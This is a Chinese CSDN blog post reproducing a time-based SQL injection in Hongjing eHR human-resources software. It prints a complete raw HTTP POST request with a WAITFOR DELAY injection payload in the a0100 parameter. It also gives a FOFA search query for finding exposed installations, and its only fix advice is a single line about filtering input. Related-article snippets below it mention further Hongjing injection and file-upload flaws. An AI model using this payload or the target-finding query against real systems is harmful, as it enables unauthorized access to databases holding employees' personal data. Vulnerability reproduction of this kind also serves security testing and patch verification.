【复现】宏景EHR SQL注入漏洞_32

最新推荐文章于 2024-04-11 10:43:03 发布
最新推荐文章于 2024-04-11 10:43:03 发布
阅读量715 收藏 9
点赞数 20
分类专栏: 安全漏洞 文章标签: 安全 web安全 系统安全 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fushuang333/article/details/135917219
版权

目录

一.概述

二 .漏洞影响

三.漏洞复现

1. 漏洞一:

四.修复建议:

五. 搜索语法:

六.免责声明

一.概述

宏景EHR从基础事务、业务协同、人才战略、HR商务智能、集成应用五个层面构建e-HR系统,包括组织机构、岗位管理、员工管理、劳动合同、考勤管理、薪资管理、保险管理、培训管理、招聘管理、绩效管理、文档管理、员工自助、经理自助、移动服务等HR管理工作模块。

二 .漏洞影响

        攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。 可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。甚至拿到服务器权限。

三.漏洞复现

1. 漏洞一:

(1)漏洞类型:  SQL注入

(2)请求类型:POST

(3)复现

找到相关系统

请求漏洞点,查看yakit响应

yakit请求包

POST /templates/attestation/../../general/info/view HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

kind=1&a0100=11';WAITFOR+DELAY+'0:0:5'--

四.修复建议:

对变量做好过滤和检测。

五. 搜索语法:

1.fofa

app="HJSOFT-HCM"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

穿着白衣
关注
  • 20
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
宏景eHR fileDownLoad SQL注入漏洞复现
0xSec
01-10 715
宏景eHR fileDownLoad 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
失心少年
06-20 1191
版权声明:本文为CSDN博主「OidBoy_G」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/qq_41904294/article/details/130944159。宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。宏景eHR < 8.2。
宏景customreport-SQL注入漏洞
最新发布
weixin_43167326的博客
04-11 1027
宏景人力资源系统是一款先进且功能丰富的人力资源管理软件,旨在为企业提供全面、高效的人力资源管理解决方案。该系统结合了最新的互联网技术和先进的人力资源管理理念,特别适用于复杂单组织或多组织客户,尤其是集团化管理和跨地域使用的场景。宏景人力资源系统的主要功能包括但不限于人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理。此外,该系统还支持人事、绩效、培训、招聘、考勤等业务的自助操作,为用户提供了极大的便利。
漏洞复现宏景人力资源信息管理系统 showmediainfo SQL注入漏洞
https://blog.echo234.cn/
04-04 1044
宏景科技是一家在智慧城市综合服务领域具有显著影响力的企业。公司以数字赋能百业兴旺,以智慧定义城市未来,致力于让城市管理更简单,让市民工作、生活更便捷。作为行业的佼佼者,宏景科技不断跟进物联网、大数据、云计算、GIS、人工智能等新技术的最新发展及应用,积极掌握并实现核心技术的更新迭代,积累了一定的技术储备。
CNVD-2023-08743:宏景HCM SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-07 1800
宏景HCM系统 categories处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
宏景eHR数据字典
08-26
宏景eHR数据字典,
宏景eHR知识型企业管理策略.doc
11-29
宏景eHR知识型企业管理策略.doc
哈尔滨东安集团应用宏景eHR系统提升管理水平
03-03
东安集团一直以来都非常重视信息技术在企业的应用,三年来,通过深入应用宏景eHR人力资源管理信息系统,大大提高了集团人力资源管理效率,软件特有的易用性、灵活性以及开放性,深得我们人力资源部人员的喜爱,大家...
ehr-extraction
03-17
标题“ehr-extraction”可能指的是一个关于电子健康记录(Electronic Health Record, EHR)数据提取的项目或工具。在这个领域,开发人员通常会构建系统来从海量的医疗数据中抽取、整理和分析有价值的信息。结合标签...
宏景软件考勤管理解决方案.docx
11-16
宏景软件考勤管理解决方案 宏景软件考勤管理解决方案是人事工作中的一项根底性管理任务,为工资核算、劳动纪律管理、绩效考核等各项人事工作提供根底性信息。该解决方案提供了多种考勤方式和假期管理的考勤管理模块...
宏景软件考勤管理解决方案样本.doc
12-06
宏景软件考勤管理解决方案样本.doc 宏景软件考勤管理解决方案样本是一种人力资源管理系统的模块,旨在解决企业中的人事工作中的考勤管理问题。该解决方案能够满足不同单位的需求,提供了C/S和B/S两个版本的考勤模块...
2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
17、畅捷通Plus_ajaxpro命令执行 18、用友NC/Cloud bsh_servlet_BshServlet命令执行 ...34、宏景HCM_SQL注入 35、华天动力OA未授权访问及SQL注入 36、致远OA_Ajaxdo_upload 37、亿赛通电子文档安全管理系统命令执行
宏景人力资源系统功能模块选型表.doc
07-23
宏景人力资源系统是一款专为杭州MC2能量联盟服饰有限公司设计的人力资源管理信息系统,旨在提升企业的人力资源管理效率和效果。本系统方案详细介绍了系统的各个功能模块,以满足公司的具体需求。 首先,宏景世纪...
宏景eHR 任意文件上传漏洞
holyxp的博客
07-25 1155
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。宏景eHR OfficeServer.jsp接口处存在任意文件上传漏洞,未经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。
漏洞复现宏景HCM-SQL注入-downlawbase
知黑而守白
04-10 385
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 showmediainfo 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
宏景多个接口存在SQL注入漏洞-1day未公开漏洞
weixin_43167326的博客
02-01 402
宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件,旨在帮助企事业单位构建高绩效组织,推动组织健康成长,提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。
宏景ehr 任意文件上传
08-13
宏景ehr存在任意文件上传漏洞。任意文件上传是指攻击者可以通过该漏洞将任意文件上传至服务器中,可能导致安全风险,例如恶意文件的传播或执行,以及系统的受损。 宏景ehr系统中的任意文件上传漏洞可以由以下原因引起:缺乏对上传文件的有效限制和过滤,或是存在未授权的文件上传接口。 攻击者可以通过利用该漏洞上传恶意文件,例如木马、恶意脚本或病毒,来实施攻击。这些恶意文件可以被用于进一步攻击服务器或窃取用户信息。例如,攻击者可以上传受感染的文件并通过执行该文件来获取系统权限,从而访问或篡改敏感数据。 为了预防宏景ehr的任意文件上传漏洞,以下措施可以提高系统的安全性: 1. 实施文件类型的检查与限制:仅允许上传可信的文件类型,例如只允许上传文档、图像或压缩文件,而不允许上传可执行文件等危险文件类型。 2. 文件内容的过滤与验证:对上传的文件进行内容检查与验证,确保其不包含任何恶意代码或脚本。 3. 对上传文件进行病毒扫描:通过病毒扫描软件对上传的文件进行检查,防止上传恶意软件。 4. 限制上传的文件大小:通过限制上传文件的大小,避免攻击者利用大文件来耗尽服务器资源或导致系统崩溃。 5. 强化身份验证与访问控制:考虑使用强密码策略、多因素身份验证以及适当的权限管理机制,确保只有授权用户可以上传文件。 6. 定期更新与维护系统:及时应用安全补丁和更新,以修复可能存在的漏洞。 综上所述,为了避免宏景ehr系统的任意文件上传漏洞带来的安全风险,需要实施有效的文件上传限制与过滤措施,并保持系统的安全性更新。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值